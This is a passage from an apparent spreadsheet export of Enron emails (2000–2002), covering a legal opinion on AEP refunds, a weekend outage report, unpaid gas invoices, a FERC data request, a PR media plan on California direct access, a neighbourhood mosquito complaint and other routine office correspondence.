&gt;     Subject:    RE: AEP Refunds - Legal Opinion_x000D_
&gt;_x000D_
&gt;     Barbara,_x000D_
&gt;_x000D_
&gt;     Can you refer me to someone with Weil, Gotshall?  This is a follow-up_x000D_
to my voice mail._x000D_
&gt;_x000D_
&gt;     Thanks._x000D_
&gt;_x000D_
&gt;            -----Original Message-----_x000D_
&gt;           From:       Sewell, Doug_x000D_
&gt;           Sent: Tuesday, February 19, 2002 4:50 PM_x000D_
&gt;           To:   Denetsosie, Troy_x000D_
&gt;           Subject:    RE: AEP Refunds - Legal Opinion_x000D_
&gt;_x000D_
&gt;           Thanks, Troy.  Dave Gorte wants an opinion from Weil, Gotshall_x000D_
specifically_x000D_
&gt;                  -----Original Message-----_x000D_
&gt;                 From:       Denetsosie, Troy_x000D_
&gt;                 Sent: Tuesday, February 19, 2002 4:33 PM_x000D_
&gt;                 To:   Sewell, Doug_x000D_
&gt;                 Subject:    AEP Refunds - Legal Opinion_x000D_
&gt;_x000D_
&gt;                 Doug,_x000D_
&gt;_x000D_
&gt;                 I called and left a message with Barbara Gray, ENA Legal._x000D_
I asked her who I can contact in order to get an opinion regarding the El_x000D_
Paso and Exxon refunds to AEP._x000D_
&gt;_x000D_
&gt;                 I have not heard back from her yet, but I will get you an_x000D_
opinion as soon as possible._x000D_
&gt;_x000D_
&gt;                 Troy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See attached file: Exxon Refund Summary.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------------------NOTE-----------------------------------------_x000D_
The information contained in this email message is intended only for use of the individual or entity named above. If the reader of this message is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please immediately notify us by email (postmaster@weil.com), and destroy the original message. Thank you_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
 - Exxon Refund Summary.doc </t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 22:44:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>eSource Presents Briefings with Senior Industry Analysts - Energy_x000D_
 and Telecom/Broadband</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
A Dialogue with Frost &amp; Sullivan's Senior Industry Analyst, Energy Markets _x000D_
 &amp;_x000D_
 Industry Analyst and Program Lead, Telecom and Bandwidth Services_x000D_
Thursday, November 1st _x000D_
eSource is pleased to host our first Analyst Summit  to share insights into the Energy and Telecom/Bandwidth Markets   _x000D_
_x000D_
Please join_x000D_
_x000D_
Patti Harper-Slaboszewicz, Senior Industry Analyst, Energy Markets_x000D_
&amp;_x000D_
    Rod Woodward,  Industry Analyst, Telecom Services &amp;  Program Lead, Wholesale Services_x000D_
He has authored a report on U.S. Bandwidth Services (Trading/Brokering/Online Exchanges) _x000D_
Download report for free at http://esource.enron.com/hot_topics.asp_x000D_
_x000D_
_x000D_
at      3:30 - 5:30 PM     EB 5C2   _x000D_
	Each presentation will last 35 minutes with 20 minutes Q&amp;A 	_x000D_
Agenda - Energy   3:30-4:30_x000D_
?	Frost &amp; Sullivan capabilities - 10 minutes _x000D_
?	Energy speaker: New Region Challenges for Retail Electric Providers - 25 minutes_x000D_
	Development of transactional capability_x000D_
	Acquiring customers_x000D_
	Quick survey of offers online in ERCOT region_x000D_
	Rate offerings will be limited by current meter capabilities_x000D_
	ERCOT Retail Providers_x000D_
	Forecasting load_x000D_
?	Questions &amp; Answers - 20 minutes _x000D_
_x000D_
	Agenda - Telecom/Broadband   4:30-5:30_x000D_
?	Frost &amp; Sullivan capabilities - 10 minutes_x000D_
?	Telecom/Broadband speaker: Industry Insights - 25 minutes_x000D_
Role of "Utilicom"/Energy providers in telecom_x000D_
Overall wholesale market perspective _x000D_
Overview of data services market _x000D_
Insight and update on bandwidth trading services_x000D_
?	Questions &amp; Answers 20 minutes _x000D_
_x000D_
_x000D_
Please RSVP to Stephanie E. Taylor at 5-7928	</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 10:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 4-27-01 through 4-30-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
April 27, 2001 5:00pm through April 30, 2001 12:00am_x000D_
------------------------------------------------------------------------------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_x000D_
Impact:  EBS_x000D_
Time:  Fri 4/27/2001 at  8:00:00 PM CT thru Fri 4/27/2001 at  9:00:00 PM CT_x000D_
 Fri 4/27/2001 at  6:00:00 PM PT thru Fri 4/27/2001 at  7:00:00 PM PT_x000D_
 Sat 4/28/2001 at  2:00:00 AM London thru Sat 4/28/2001 at  3:00:00 AM_x000D_
Outage:  OSSPROD Server Move - Portland to Houston (EBS)_x000D_
Environments Impacted:  All_x000D_
Purpose: ECOMS is the EBS order management system. It is a mission ciritical _x000D_
app, and the server is being moved to Houston. _x000D_
Oracle does not function in a NAT environment, so network changes must be _x000D_
made to accomodate the move._x000D_
Backout: Put original ACL back in place_x000D_
Contact(s):  Dennis McGough    713-345-3143_x000D_
_x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: No Scheduled Outages_x000D_
_x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  _x000D_
Impact:  CORP_x000D_
Time:  Fri 4/27/2001 at  8:00:00 PM CT thru Sat 4/28/2001 at  12:00:00 AM CT_x000D_
 Fri 4/27/2001 at  6:00:00 PM PT thru Fri 4/27/2001 at  10:00:00 PM PT_x000D_
 Sat 4/28/2001 at  2:00:00 AM London thru Sat 4/28/2001 at  6:00:00 AM London_x000D_
Outage:  Unify Server Name Changes_x000D_
Environments Impacted:  Unify Development_x000D_
Purpose: Full complinace with naming standard._x000D_
Backout: A full backup of the servers and Emergency Repair disk will be done _x000D_
prior to the name change._x000D_
Contact(s):  Charles Ballmer    713-853-0684_x000D_
  Darryl Vinson        713-345-8726_x000D_
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Mon, 11 Dec 2000 01:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Friday Evening</t>
  </si>
  <si>
    <t xml:space="preserve">Yep, we had a nice time.  I tried calling you about 4:00 yesterday, but there _x000D_
was no answer, so I figured you didn't want to go._x000D_
_x000D_
_x000D_
_x000D_
	"Patti Young" &lt;pyoung@cliverunnells.com&gt;_x000D_
	12/11/2000 10:53 AM_x000D_
		 _x000D_
		 To: &lt;Tana.Jones@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Friday Evening_x000D_
_x000D_
_x000D_
Hey, I totally forgot about last night (Sunday).  I was having my car washed_x000D_
about the time I should have been thinking about getting ready.  Please_x000D_
forgive me for I know it would have been a nice "do" to attend.  Did_x000D_
Michelle and you have a nice time?_x000D_
_x000D_
Thanks for going with me on Friday night._x000D_
_x000D_
Talk to you soon._x000D_
_x000D_
 Patti_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Tana.Jones@enron.com [mailto:Tana.Jones@enron.com]_x000D_
Sent: Friday, December 08, 2000 3:29 PM_x000D_
To: pyoung@cliverunnells.com_x000D_
Subject: RE: Friday Evening_x000D_
_x000D_
_x000D_
_x000D_
Are you there.  I tried calling and no one picked up.  I'm ready to go..._x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@cliverun        To:     &lt;Tana.Jones@enron.com&gt;_x000D_
                    nells.com&gt;              cc:_x000D_
                                            Subject:     RE: Friday Evening_x000D_
                    12/08/2000 05:03_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
O.K._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Tana.Jones@enron.com [mailto:Tana.Jones@enron.com]_x000D_
Sent: Friday, December 08, 2000 12:40 PM_x000D_
To: pyoung@cliverunnells.com_x000D_
Subject: Re: Friday Evening_x000D_
_x000D_
_x000D_
_x000D_
So far, I can probably leave on time today, which would be about 5:30 pm._x000D_
Let's just check again as the end of the day gets closer.  I think it would_x000D_
be a good idea to meet there, since we're coming from opposite directions._x000D_
Dinner sounds good to me...._x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@cliverun        To:     "Tana Jones"_x000D_
&lt;tana.jones@enron.com&gt;_x000D_
                    nells.com&gt;              cc:_x000D_
                                            Subject:     Friday Evening_x000D_
                    12/08/2000 04:32_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tana,_x000D_
_x000D_
If you are still interested in doing the Williams Collection do, what would_x000D_
be a good time for you to go.  We can meet there and then go to dinner._x000D_
Or,_x000D_
you could come by my place and get a look again and help me pick out the_x000D_
right furniture.  Whatever is convenient for you, please let me know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 10:15:59 -0800 (PST)</t>
  </si>
  <si>
    <t>desk change list</t>
  </si>
  <si>
    <t xml:space="preserve">Will,_x000D_
_x000D_
I am attaching a list of the deals (both physical and financial) which simply need a desk name change to East or West Bankrupt, whichever is relevant.  My list details the deal #, counterparty full name and the termination date.  Let me know if this makes sense, and as always, thank you so much for your help!_x000D_
_x000D_
Casey_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 1 Apr 2002 07:49:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.germany@enron.com', 'eric.boyt@enron.com'})</t>
  </si>
  <si>
    <t>RE: Cornerstone, MidAmerica</t>
  </si>
  <si>
    <t xml:space="preserve">Cornerstone has an ISDA which was terminated effective 11/28/01.  They have two outstanding invoices (possibly others that I am not aware of) in the amounts of $1,747,664.00  and $234,418.54.  Other outstanding invoices must be related to physical transactions._x000D_
_x000D_
Legal's termination log contains the following comment: "Cornerstone will make no further payments or delivery."_x000D_
_x000D_
Hope this helps._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Monday, April 01, 2002 9:17 AM_x000D_
To:	Dicarlo, Louis; Boyt, Eric_x000D_
Cc:	Hamic, Priscilla_x000D_
Subject:	FW: Cornerstone, MidAmerica_x000D_
_x000D_
It looks like Cornerstone Propane, L.P. has not paid their December invoice for physical or financial.  Is there anything going on with them that you guys are aware of?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hamic, Priscilla  _x000D_
Sent:	Monday, April 01, 2002 9:05 AM_x000D_
To:	Germany, Chris_x000D_
Subject:	Cornerstone, MidAmerica_x000D_
_x000D_
Neither of these companies have paid us for December 2001 gas.  MidAmerica is probably holding payment for forward value, I don't know about Cornerstone.  Both had invoices sent to them for December sales.  Attached is Cornerstone's SAP balance.  Call me if you need any further information._x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Metafile) &gt;&gt; _x000D_
_x000D_
Priscilla Hamic_x000D_
Enron North America Corp._x000D_
Tel: 713-345-3736_x000D_
Fax: 713-646-8420_x000D_
E-mail: priscilla.hamic@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 15:04:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>1.  Just wanted to let you know that not every Californian agrees with our  _x000D_
Attorney General. _x000D_
2. Read with interest a Dow Jones story regarding about a 4 page proposal  _x000D_
Enron gave to Speaker Hertzberg allowing large commercial customers. _x000D_
3.  Would love to see that proposal. _x000D_
4.  Thanks.</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 21:39:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 10/15/01; HourAhead hour: 24;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 10/15/01; HourAhead hour: 24;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001101524.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing...</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 02:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brian.harrington@ferc.fed.us', 'christi.nicolay@enron.com'})</t>
  </si>
  <si>
    <t>Re: Response to FERC Data Request for Bulk Power Investigation</t>
  </si>
  <si>
    <t xml:space="preserve">Brian - I''ll be on vacation next week so if you have any questions, please _x000D_
call my counterpart in Houston, Christi Nicolay.  Her E-mail address is _x000D_
above.  Her phone number is (713) 853-7007.  _x000D_
_x000D_
Christi will be pulling together the answer to data request number 8 for you _x000D_
for just the WSCC.  Christi - Chris is your contact person here to make sure _x000D_
the numbers are correct._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Brian Harrington" &lt;brian.harrington@ferc.fed.us&gt;                      _x000D_
     09/15/2000 04:59 AM_x000D_
	_x000D_
_x000D_
To: &lt;Mary.Hain@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: Response to FERC Data Request for Bulk Power Investigation_x000D_
_x000D_
_x000D_
I appreciate your quick response.  Yes, we would like response to question 8 _x000D_
for the WSCC only.  Thank yor the names at Enron Wind.  I will contact them _x000D_
shortly.  Other team members have reviewed your responses, but I have not got _x000D_
a l chance to look at them in detail.  I plan to do this today.  As a resutl, _x000D_
I may have further questions or data needs depending upon what was provided.  _x000D_
Please call me at 202-208-2493 if you need anything._x000D_
_x000D_
&gt;&gt;&gt; &lt;Mary.Hain@enron.com&gt; 09/14/00 08:06PM &gt;&gt;&gt;_x000D_
_x000D_
Since you only wanted information for the WSCC, do you want the answer to_x000D_
number 8 to be corrected to only include information for the WSCC?_x000D_
_x000D_
We don't have any information here about Enron Winds' generators.  I have_x000D_
forwarded your data requests to the following people at Enron Wind who I_x000D_
hope will be able to help you:  John Lamb, Michael Payne, and Hap Boyd._x000D_
Their addresses are: Michael Payne/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Hap_x000D_
Boyd/EWC/Enron@Enron, John Lamb/EWC/Enron@ENRON_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 (Embedded     Enron Capital &amp; Trade Resources Corp._x000D_
 image moved_x000D_
 to file:      From:  "Brian Harrington"_x000D_
 pic05447.pcx) &lt;brian.harrington@ferc.fed.us&gt;_x000D_
               09/12/2000 08:17 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   &lt;chris.stokley@enron.com&gt;, &lt;mary.hain@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Response to FERC Data Request for Bulk Power Investigation_x000D_
_x000D_
_x000D_
Thank you for your timely response to FERC's data request.  To date, I have_x000D_
received responses to questions 2-8.  The only oustanding items are_x000D_
responses to question #1 and a portion of #4 (unit identifier).  It is_x000D_
understood that the responses for #1 will be availalbe after September 15_x000D_
and the additional information for #4 will be available this week.  We will_x000D_
look over your responses and call you if clarification or additional_x000D_
information is necessary.  We will treat as you requested #2, 3, 4, 6, and_x000D_
8 as Confidential._x000D_
_x000D_
You were correct is responding only to the WSCC.  We did not purovidea_x000D_
separate data requests to Enron Wind.  In not doing so, what information_x000D_
are we missing from our data requests?  Please e-mail me a response to this_x000D_
questions.  For any other concerns please continue to use e-mail or contact_x000D_
me at 202-208-2493._x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 05:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>YO</t>
  </si>
  <si>
    <t>How's this??</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.kaufman@enron.com', 'james.steffes@enron.com', 'steven.kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>----- Forwarded by Sandra McCubbin/NA/Enron on 03/02/2001 11:56 AM -----_x000D_
_x000D_
	Scott Govenar &lt;sgovenar@govadv.com&gt;_x000D_
	03/01/2001 05:17 PM_x000D_
		 _x000D_
		 To: Karen Denne &lt;kdenne@enron.com&gt;_x000D_
		 cc: Sandra McCubbin &lt;Sandra.McCubbin@enron.com&gt;_x000D_
		 Subject: [Fwd: Direct Access Coalition Media Plan]_x000D_
_x000D_
_x000D_
Karen,_x000D_
_x000D_
I just wanted you to be aware of Edelman's activities on direct access._x000D_
_x000D_
Scott_x000D_
_x000D_
Received: (qmail 77871 invoked by uid 41); 28 Feb 2001 04:07:03 -0000_x000D_
Received: from nycxims1.edelman.com (63.96.56.110)  by mx7.quiknet.com with _x000D_
SMTP; 28 Feb 2001 04:07:03 -0000_x000D_
Received: by nycxims1.edelman.com with Internet Mail Service (5.5.2653.19) id _x000D_
&lt;FY7A0FGF&gt;; Tue, 27 Feb 2001 22:46:37 -0500_x000D_
Message-ID: &lt;F1011D165600D411AC5400D0B720EE10A621F8@SFOXMB1&gt;_x000D_
From: "Fairchild, Tracy" &lt;tracy.fairchild@edelman.com&gt;_x000D_
To: dhunter@smithandkempton.com, brbarkovich@earthlink.net,  _x000D_
wbooth@booth-law.com, drothrock@cmta.net, jackson_gualco@gualcogroup.com,  _x000D_
kmills@cfbf.com, kmccrea@sablaw.com, mday@gmssr.com,  nplotkin@tfglobby.com, _x000D_
spahnn@hnks.com, wlarson@calstate.edu,  vincent.stewart@ucop.edu, _x000D_
gharrison@calstate.edu, sgovenar@govadv.com,  hgovenar@govadv.com, _x000D_
smccubbi@enron.com, lhastings@cagrocers.com,  theo@ppallc.com, _x000D_
cra@calretailers.com, mmoretti@calhealth.org,  wbrown@lhom.com, _x000D_
randy_britt@robinsonsmay.com, "DiMare, Dominic"  _x000D_
&lt;Dominic.DiMare@calchamber.com&gt;, vjw@ceert.org, rcavanagh@nrdc.org,  _x000D_
rochmanm@spurr-remac.org, rrichter@calhealth.org, ken_pietrelli@ocli.com,  _x000D_
dennis.flatt@kp.org, richard.seguin@kp.org, arm@phaser.com,  _x000D_
djsmith@smithandkempton.com, "Fairchild, Tracy"  _x000D_
&lt;tracy.fairchild@edelman.com&gt;, "Allen, Stevan"  &lt;stevan.allen@edelman.com&gt;, _x000D_
"Beiser, Megan" &lt;Megan.Beiser@edelman.com&gt;,  "Manuel, Erica" _x000D_
&lt;Erica.Manuel@edelman.com&gt;, "Warner, Jami"  &lt;jami.warner@edelman.com&gt;_x000D_
Subject: Direct Access Coalition Media Plan_x000D_
Date: Tue, 27 Feb 2001 22:46:28 -0500_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----_=_NextPart_000_01C0A139.07D39B10"_x000D_
X-Mozilla-Status2: 00000000_x000D_
_x000D_
_x000D_
Hello to the Direct Access Coalition:_x000D_
_x000D_
Below you will find a summary of the press strategy that Edelman Public_x000D_
Relations intends to employ over the coming weeks in collaboration with the_x000D_
Alliance for Retail Energy Markets and the broader Direct Access Coalition._x000D_
I will also outline the information that I need from Direct Access Coalition_x000D_
members who are willing to be involved in media outreach and interviews._x000D_
And finally, I have attached supporting documents that you can use as_x000D_
background material to prep for your responses to any media inquiries that_x000D_
you may receive._x000D_
_x000D_
This Week_x000D_
_x000D_
1.   We are drafting a "pitch letter" to send out by the end of this week_x000D_
via blast e-mail and fax to the following media lists: 1)capitol press corps_x000D_
reporters; 2) mainstream media reporters working the energy crisis; and 3)_x000D_
trade media.  We may also outreach to our editorial board list as well.  Our_x000D_
pitch will be focused on what it will really mean for small business and C&amp;I_x000D_
customers to lose the option of retail choice at a time when they are_x000D_
suffering the financial hardships of skyrocketing energy bills. We will_x000D_
address the effect on California's future business climate if direct access_x000D_
is not preserved through legislation that corrects the problems that AB1x_x000D_
caused for retail choice.  And finally, we will address the point that no_x000D_
matter what direction California ultimately takes, direct access must be a_x000D_
part of the solution.  Reporters have seen the recent polls which illustrate_x000D_
California businesses' concerns with the path the state is on so this is a_x000D_
prime opportunity to build on those recent media stories._x000D_
_x000D_
2.    We recommend a conference call with AReM and the Direct Access_x000D_
Coalition on Friday to address the questions and suggestions on the press_x000D_
strategy outlined here._x000D_
_x000D_
3.     Determine which people in the Direct Access Coalition are willing to_x000D_
take media calls on behalf of the coalition._x000D_
_x000D_
Next Week_x000D_
_x000D_
1.   Follow up with key reporters who received the pitch letter._x000D_
_x000D_
2.   Evaluate the language of SB 27x and determine whether there will be an_x000D_
opportunity to hold a news conference with Sen. Bowen in the near future._x000D_
Monitor movement at the PUC and determine whether a press conference may be_x000D_
effective in this arena, or whether we may need to use the option of sending_x000D_
a media alert before the March 7 hearing, followed by a news release after_x000D_
the hearing._x000D_
_x000D_
3.   Place op-eds (opinion pieces) with key newspapers._x000D_
_x000D_
4.   Contact radio news shows and TV public affairs shows (i.e. California_x000D_
Capitol Week and the California Report) to secure_x000D_
media interviews._x000D_
_x000D_
5.    Revise the SB 27x fact sheet (attached) to reflect the realities of_x000D_
the amended language in SB 27x._x000D_
_x000D_
 What We Need From You_x000D_
_x000D_
1.  If you are willing to speak with the media, or you have_x000D_
customers/clients with a positive direct access story to tell, please_x000D_
respond to this email as soon as you can with your name and contact_x000D_
information._x000D_
_x000D_
2.  If you have draft op-eds written that need to be placed with newspapers_x000D_
on behalf of your association and the broader coalition, we are willing to_x000D_
do this for the you._x000D_
_x000D_
3.  If you have colleagues and/or staff that are already working with the_x000D_
media it would be helpful to have this information so that we can_x000D_
collaborate as necessary._x000D_
_x000D_
The Documents Below_x000D_
&gt;  All documents are works in progress, so if you have suggestions on_x000D_
&gt; potential changes, please feel free to share them with us._x000D_
&gt;_x000D_
_x000D_
Thank you._x000D_
_x000D_
&gt;  &lt;&lt;AREM Fact Sheet 2212001 ver 2272001.doc&gt;&gt;_x000D_
&gt;  &lt;&lt;Q&amp;A @ ESP Reversions 22701.doc&gt;&gt;  &lt;&lt;AReM FAQ FINAL3.doc&gt;&gt;  &lt;&lt;AREM Fact_x000D_
&gt; FINAL3.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt; Tracy Fairchild_x000D_
&gt; Account Supervisor_x000D_
&gt; Edelman Public Relations Worldwide_x000D_
&gt; (916) 442-2331_x000D_
&gt; tracy.fairchild@edelman.com_x000D_
&gt;_x000D_
_x000D_
 - AREM Fact Sheet 2212001 ver 2272001.doc_x000D_
 - Q&amp;A @ ESP Reversions 22701.doc_x000D_
 - AReM FAQ FINAL3.doc_x000D_
 - AREM Fact FINAL3.doc</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 20:24:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edgonzales@ev1.net'})</t>
  </si>
  <si>
    <t>Re: *EMCA* Mosquitoes</t>
  </si>
  <si>
    <t xml:space="preserve"> Mosquito magnet? Please explain, decribe. Does it really work?_x000D_
Ed ....Neartown Assoc prez_x000D_
_x000D_
----- Original Message ----- _x000D_
From: zaeza &lt;mailto:zaeza@unplace.com&gt; _x000D_
To: emca@yahoogroups.com &lt;mailto:emca@yahoogroups.com&gt; _x000D_
Sent: Wednesday, October 24, 2001 9:51 PM_x000D_
Subject: Re: *EMCA* Mosquitoes_x000D_
_x000D_
I  bought a mosquito magnet - it works wonders_x000D_
expensive, but good!_x000D_
Nathalie_x000D_
Bomar_x000D_
 _x000D_
_x000D_
----- Original Message ----- _x000D_
From: Amy &amp; Alistair &lt;mailto:barnesfamilyus@prodigy.net&gt; _x000D_
To: emca@yahoogroups.com &lt;mailto:emca@yahoogroups.com&gt; _x000D_
Sent: Wednesday, October 24, 2001 8:30 PM_x000D_
Subject: *EMCA* Mosquitoes_x000D_
_x000D_
I hate to do this, and do not want to put anyone out, but I need some help._x000D_
 _x000D_
The mosquitoes are terrible.  It is hurting me to look at Kendall (my son) any more, as the number of bites on him have gone into the double digits._x000D_
 _x000D_
I cannot imagine that we are the only ones suffering from these nasty little pests, and I want to do something about it._x000D_
 _x000D_
If any of you have time tomorrow, can you do me this - can you call Harris County Mosquito Control and help me complain?  I figure that if a whole load of us start calling, they won't be able to ignore us._x000D_
 _x000D_
Their number is 713-440-4800.  I get a recording when I call, but their hours are 8 - 5, so maybe we can talk to a live person tomorrow._x000D_
 _x000D_
Thank you for helping me, and ultimately helping everyone._x000D_
 _x000D_
Best Regards,_x000D_
 _x000D_
Amy Barnes_x000D_
_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service &lt;http://docs.yahoo.com/info/terms/&gt;. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service &lt;http://docs.yahoo.com/info/terms/&gt;. _x000D_
_x000D_
_x000D_
_x000D_
Yahoo! Groups Sponsor	 _x000D_
ADVERTISEMENT_x000D_
 &lt;http://rd.yahoo.com/M=213858.1650662.3186813.1261774/D=egroupweb/S=1705044493:HM/A=763352/R=0/*http://www.classmates.com/index.tf?s=5085&gt;	_x000D_
  &lt;http://us.adserver.yahoo.com/l?M=213858.1650662.3186813.1261774/D=egroupmail/S=1705044493:HM/A=763352/rand=984118936&gt;	_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service &lt;http://docs.yahoo.com/info/terms/&gt;. </t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 11:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jdeason@chbh.com'})</t>
  </si>
  <si>
    <t>Reference Market - makers</t>
  </si>
  <si>
    <t>Jim:_x000D_
_x000D_
In connection with our disussion regarding Market Quotation and "Reference _x000D_
Market - makers" in the Schedule (specifically Enron's request to delete _x000D_
clause (b) to the Section 12 definition), I am advised that it would be _x000D_
difficult to locate four leading dealers with offices in the same city.  With _x000D_
respect to the outstanding trades, for example, we would like to know which _x000D_
city has  four leading dealers  for quoting Mid-Columbia prices?  Please let _x000D_
us know.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:10:26 -0800 (PST)</t>
  </si>
  <si>
    <t>Strictly Confidential</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
John, I maybe "seeing ghosts" but the prospects of us getting paid under the current form of paper are remote. As per my voicemail, the following changes need to made: _x000D_
_x000D_
1. Performance Bonuses - needs to be small caps (ie performance bonuses)_x000D_
2. remove the words "to be provided to you under your existing bonus opportunity" so the sentence reads " This memorandum describes performance bonuses for calendar year 2001 performance..."_x000D_
3. after affiliate, insert " or any of the respective successors, assigns, representatives, trustees or administrators"_x000D_
4. specify "U.S $"_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 16:23:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'kam.keiser@enron.com', 'russ.severson@enron.com', 'scott.palmer@enron.com', 'john.valdes@enron.com', 'errol.mclaughlin@enron.com', 'c..giron@enron.com'})</t>
  </si>
  <si>
    <t>New Corp Login</t>
  </si>
  <si>
    <t>Question for NetCo employees:_x000D_
The new corp id's xfer to UBS is being considered for this Sunday.  Hence, no start menu access to estate.  You will still have access to NT estate drive data to copy._x000D_
Does anyone have the need to retain a estate id for support estate application during the last week?  Exceptions have to be authorized._x000D_
Wanted to get a preliminary need analysis..._x000D_
 _x000D_
This was sent by an IT manager, let me know your thoughts... O</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>If required my cell number is 713-806-6294._x000D_
_x000D_
Any time of the day.</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 05:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: deal 506265</t>
  </si>
  <si>
    <t xml:space="preserve">Broker is right - it's been changed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
01/26/2001 01:02 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 506265_x000D_
_x000D_
_x000D_
Mark Fischer deal 506265_x000D_
Prebon shows us as buying not selling_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 16:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eThink About It: October 31, 2000</t>
  </si>
  <si>
    <t>ThinkBank went live with a bang last Friday!  The Idea Vault already has more _x000D_
than 20 innovative entries, and the eThink team has been busy routing these _x000D_
ideas to the right people._x000D_
_x000D_
There are ideas about everything from new trading opportunities to hot air _x000D_
balloons.  Visit the ThinkBank today.  Got an idea?  Make a deposit.  Need _x000D_
some help?  Make a withdrawal._x000D_
_x000D_
_x000D_
_x000D_
eMeet has a brand-new look.  Have you seen it yet?  We took your feedback -- _x000D_
thanks for posting it right there in eMeet -- and created a more dynamic and _x000D_
informative site for you.  Check it out.  Go to eMeet now!_x000D_
_x000D_
_x000D_
Don't miss Cindy Olson's eSpeak this Thursday, November 3 at 10:00 am Houston _x000D_
time.  Cindy, executive vice president of Human Resources &amp; Community Affairs _x000D_
will be answering your questions about the new Enron employee stock option _x000D_
program._x000D_
And, if you can't make the live event (all together now), be sure to _x000D_
pre-submit your question(s) on the eSpeak site!_x000D_
_x000D_
_x000D_
